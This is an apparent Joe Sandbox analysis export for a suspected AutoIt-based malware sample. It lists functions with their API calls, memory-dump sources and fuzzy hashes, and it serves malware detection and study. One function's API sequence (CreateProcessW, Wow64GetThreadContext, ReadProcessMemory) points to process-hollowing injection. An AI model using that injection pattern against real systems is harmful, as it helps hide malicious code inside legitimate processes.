Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
Instruction ID: e3cf0bc5bec2ce767f3256ff9aa8618c188e7c75c17602f3ce16b51d8de4b9ab
Opcode Fuzzy Hash: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
Instruction Fuzzy Hash: EFE08636180224B7EB311F54EC09FDE7B58FB06B71F104124FB24690E087B126129798

Uniqueness

Uniqueness Score: -1.00%

Function 00C28F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C28FA5

Part of subcall function 00BE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9C64), ref: 00BE2FA9
Part of subcall function 00BE2F95: GetLastError.KERNEL32(00000000,?,00BE9C64), ref: 00BE2FBB

_free.LIBCMT ref: 00C28FB6
_free.LIBCMT ref: 00C28FC8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction ID: a9873f2dc05abe26ae11120d0ec2f6e282c018da3f6658c97aa68139d8aaf379
Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction Fuzzy Hash: F1E0C2A120A7104ACA20A6F9BE01A8317EE0F48351708084DB419DB142DF24E9418064

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C0002B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 42e9f1140b3c327f4a4ed0c83e7731f188011c796e2c4ca370e97c3a87cc4e70
Instruction ID: aabba3fd1c1e68e9d955e7dc7af8509f1ae44090906e555be1c63cfd38153c52
Opcode Fuzzy Hash: 42e9f1140b3c327f4a4ed0c83e7731f188011c796e2c4ca370e97c3a87cc4e70
Instruction Fuzzy Hash: 26225674508245CFCB24DF14C495F6ABBE0FF84304F2589ADE89A9B262D731ED81DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BC4E1A

Strings

EA06, xrefs: 00BFDCF5

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 695a1f24b2d42caad558a65eb260e39e2abca824285768c97f16db781e676865
Instruction ID: 23d591b9de95662c92ad249ad7e87c2fa75854896fa6b069b4cb51039e07dd55
Opcode Fuzzy Hash: 695a1f24b2d42caad558a65eb260e39e2abca824285768c97f16db781e676865
Instruction Fuzzy Hash: 5C414C31A041595BDF255B6488B1FBE7BE6EB45300F2944FDED82DB282C7319F8583A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00BC4992

Part of subcall function 00BE35AC: __lock.LIBCMT ref: 00BE35B2
Part of subcall function 00BE35AC: DecodePointer.KERNEL32(00000001,?,00BC49A7,00C181BC), ref: 00BE35BE
Part of subcall function 00BE35AC: EncodePointer.KERNEL32(?,?,00BC49A7,00C181BC), ref: 00BE35C9

Part of subcall function 00BC4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BC4A73
Part of subcall function 00BC4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC4A88

Part of subcall function 00BC3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B7A
Part of subcall function 00BC3B4C: IsDebuggerPresent.KERNEL32 ref: 00BC3B8C
Part of subcall function 00BC3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C862F8,00C862E0,?,?), ref: 00BC3BFD
Part of subcall function 00BC3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC49D2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 383975bcc9ff9a06c13199f8f76b82388155c1598359e70fe0e4566c83a0a6f7
Instruction ID: fbb2f0b9d43491a4df6eacee31b0c5fd03de4597385a596236c47efc5f3aff13
Opcode Fuzzy Hash: 383975bcc9ff9a06c13199f8f76b82388155c1598359e70fe0e4566c83a0a6f7
Instruction Fuzzy Hash: 44116A719183119FD300EF29D849B0EFBE8EB95710F10456EF445872A1DBB09645CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00BC5981,?,?,?,?), ref: 00BC5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00BC5981,?,?,?,?), ref: 00BFE19C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 75744825f1a07acb3c7b934926b1abfe9d5857ecb6ab227b8e4d4c7d69ccb441
Instruction ID: 8d55e7cecef5e0a58d377de6f0bf522dd58824b64fb0c4e20e485c1aca60f730
Opcode Fuzzy Hash: 75744825f1a07acb3c7b934926b1abfe9d5857ecb6ab227b8e4d4c7d69ccb441
Instruction Fuzzy Hash: FF015E70244709BEF7340E25CC8AF763ADCEB05768F10835DBAE56A1E0C6B46E898B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BE0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BE594C: __FF_MSGBANNER.LIBCMT ref: 00BE5963
Part of subcall function 00BE594C: __NMSG_WRITE.LIBCMT ref: 00BE596A
Part of subcall function 00BE594C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00BE1013,?), ref: 00BE598F

std::exception::exception.LIBCMT ref: 00BE102C
__CxxThrowException@8.LIBCMT ref: 00BE1041

Part of subcall function 00BE87DB: RaiseException.KERNEL32(?,?,?,00C7BAF8,00000000,?,?,?,?,00BE1046,?,00C7BAF8,?,00000001), ref: 00BE8830

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: d3d7c47286495586ed016dc3e2da95791aefc348eb8c6f8445615f8ee30ab746
Instruction ID: 5ef31faa789cbad313eb9435fe67042b6320e4d6bbd8ae53c90b8bb8bea106d5
Opcode Fuzzy Hash: d3d7c47286495586ed016dc3e2da95791aefc348eb8c6f8445615f8ee30ab746
Instruction Fuzzy Hash: 8FF02D7450029DA6CB20BA5ADC159DF77ECDF01351F2004A5FC0892592DFB0CEC4D2D4

Uniqueness

Uniqueness Score: -1.00%

Function 00BE582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BE585C
__lock_file.LIBCMT ref: 00BE587D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 70f4914845b2216e34e5a910459881d9c04464f38ebe539b6ff882694807c17a
Instruction ID: ff3ea0cbc767362e313cb90cc42acb79433d30b093be6c0f5989bd2c3180ac08
Opcode Fuzzy Hash: 70f4914845b2216e34e5a910459881d9c04464f38ebe539b6ff882694807c17a
Instruction Fuzzy Hash: 88018471C00A88EBCF22AF6B8C0559F7BE5AF40364F148295F8285B1A1DB318A21DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BE55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

__lock_file.LIBCMT ref: 00BE561B

Part of subcall function 00BE6E4E: __lock.LIBCMT ref: 00BE6E71

__fclose_nolock.LIBCMT ref: 00BE5626

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 881bd608a70fb8ef58f1f58ad56d8b342a48934a93c523344e4e8c41e803d9fb
Instruction ID: b376317ff38c65a9a582a6ce9b3b61ae3c0452054e7e8c3f92031e78993f15a2
Opcode Fuzzy Hash: 881bd608a70fb8ef58f1f58ad56d8b342a48934a93c523344e4e8c41e803d9fb
Instruction Fuzzy Hash: CAF0B471800E849ED731AF778C0276E77E16F40338F5582C9E429AB1C1CF7C8901AB55

Uniqueness

Uniqueness Score: -1.00%

Function 038D12FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 038D1ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 038D1B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D1B73

Memory Dump Source

Source File: 00000000.00000002.1448279966.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38d0000_150-425-2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 6c5c313acc90c2030c7c8aeb1477e0cc9f308dc86c13250fa747a69b233514f5
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: D612DD24E24658C6EB24DF64D8547DEB332EF68300F1091E9910DEB7A4E77A4E81CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9275851415fb0e9176292966026fa7e42936b86f0009bac6399c455ac57f98d
Instruction ID: d2a2a9c62c5cf85bc763dd3ca4a0c8fffd48c1dcbca0214f57734709bac423ff
Opcode Fuzzy Hash: d9275851415fb0e9176292966026fa7e42936b86f0009bac6399c455ac57f98d
Instruction Fuzzy Hash: 4A517C35600604ABCF14EF68C995FAEB7E5AF85710F1480E9F916AB392DB30EE40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BC774A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
Instruction ID: 0ae7eb661026d331e3c6b2f9d58e3c35fc1576b9e4f334017be64bea17fc0c90
Opcode Fuzzy Hash: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
Instruction Fuzzy Hash: CA315C79248A069FC7249F19C590E21F7E0FF08310714C5AEE99A8B765EB70EC91DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00BC5CF6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 86b11c3d40407be1061e0d4b978239b3300c08d95099930926704963034f4e38
Instruction ID: 6cefde13584a15c9ac1b76dc45ba192d52f13bd43cb8b1853f545e21bbb916e0
Opcode Fuzzy Hash: 86b11c3d40407be1061e0d4b978239b3300c08d95099930926704963034f4e38
Instruction Fuzzy Hash: 6A311C71A00B19ABCB28DF69C484B6EB7F5FF48320F148669D81A93710D771B9A0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C000D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C000E1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1b5f7dbb47469c8efa227aa972bff94cc21429ba4f35ca7422e99112f8a80231
Instruction ID: 529e2b7e6e0bf79eb376a192fe54c16a983d90f4e73b997ea0de63c26a9a9f11
Opcode Fuzzy Hash: 1b5f7dbb47469c8efa227aa972bff94cc21429ba4f35ca7422e99112f8a80231
Instruction Fuzzy Hash: BD41D2745083519FDB24DF14C484F1ABBE0BF45318F1988ACE89A8B762C732E885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC68A Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00BCC73D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 0c2499e365a69b958c2222e21ac33e9960d9d5b3e80406e2d51cde9d04ceebcd
Instruction ID: c7be32893026b19b4d3d88d0209e5bd7dda9e70f36473d25b7c2b189aec30295
Opcode Fuzzy Hash: 0c2499e365a69b958c2222e21ac33e9960d9d5b3e80406e2d51cde9d04ceebcd
Instruction Fuzzy Hash: F1213672908385CFD7035B79AC50AA9FFF09F17220F4A45DACC909B2A3E2244C02CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00BC79AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BC79F9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
Instruction ID: c129b9f296bcf5e7f5f8e2543b5d28ff8a005fc51eccd667810359678212b9fd
Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
Instruction Fuzzy Hash: DB11AF32248205AFD714DF28D881E6EB7E9EF45324724859EF916DB2A1DF32EC118B90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00BCC73D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: accaf734927ad25bcd44fc0079aba431c43068e35759b03679294b71c65e4020
Instruction ID: 1d89e52d2c1abd7a3ece3084876dc416eae60205973a8d0c12f89cd5c7e69899
Opcode Fuzzy Hash: accaf734927ad25bcd44fc0079aba431c43068e35759b03679294b71c65e4020
Instruction Fuzzy Hash: C511B771900119DBCB14EBA9DC81EEEF7F8EF64350F14816AF815A7190DB309D05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00BC4D4D

Part of subcall function 00BE548B: __wfsopen.LIBCMT ref: 00BE5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4F6F

Part of subcall function 00BC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00BC4D02

Part of subcall function 00BC4DD0: _memmove.LIBCMT ref: 00BC4E1A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 245fdaa1d0cff99a27e32bea1ef264d0c726a77381a3660de05c9940e436c59b
Instruction ID: 7ecac75b6c2a0e033b1184528f4ae6bb31ffa97a88370f5615b492cff9a73977
Opcode Fuzzy Hash: 245fdaa1d0cff99a27e32bea1ef264d0c726a77381a3660de05c9940e436c59b
Instruction Fuzzy Hash: 9C11BF31600209AACB20AF60D866FAE76E99B40711F1084ADF946A6281DB719B099BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C001AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C001BB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5c49cf41f8cef334d8a8e5a9c92a26993c8613a011f005cd2313b0667cc8cd21
Instruction ID: f8524bc1e4fe39dd0bc5263ce7e5794a414b028362e579c6f21150a2df4399ff
Opcode Fuzzy Hash: 5c49cf41f8cef334d8a8e5a9c92a26993c8613a011f005cd2313b0667cc8cd21
Instruction Fuzzy Hash: C621F0B4508341DFCB14DF54C484F1ABBE0BF85308F1589ACE98A57762D731E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

